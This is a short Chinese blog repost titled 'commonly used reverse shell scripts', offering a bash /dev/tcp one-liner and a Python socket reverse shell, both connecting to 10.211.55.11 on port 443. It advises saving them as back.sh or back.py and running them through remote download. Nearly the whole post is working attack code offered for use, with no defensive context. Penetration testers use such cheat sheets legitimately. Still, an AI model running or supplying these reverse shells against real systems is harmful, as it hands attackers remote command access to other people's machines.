码迷,mamicode.com
首页 > 系统相关 > 详细

常用的反弹shell脚本

时间:2016-12-07 14:02:04      阅读:555      评论:0      收藏:0      [点我收藏+]

标签:脚本   color   常用   nec   this   file   git   span   stream   

bash shell反弹脚本

/bin/bash -i > /dev/tcp/10.211.55.11/443 0<&1 2>&1

 

Python shell 反弹脚本

#!/usr/bin/python
# This is a Python reverse shell script

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.211.55.11",443));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

 

利用方式,保存成back.sh 或者back.py ,通过远程下载执行即可利用!

借鉴:

https://jivoi.github.io/2015/07/01/pentest-tips-and-tricks/

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

常用的反弹shell脚本

标签:脚本   color   常用   nec   this   file   git   span   stream   

原文地址:http://www.cnblogs.com/autopwn/p/6140651.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!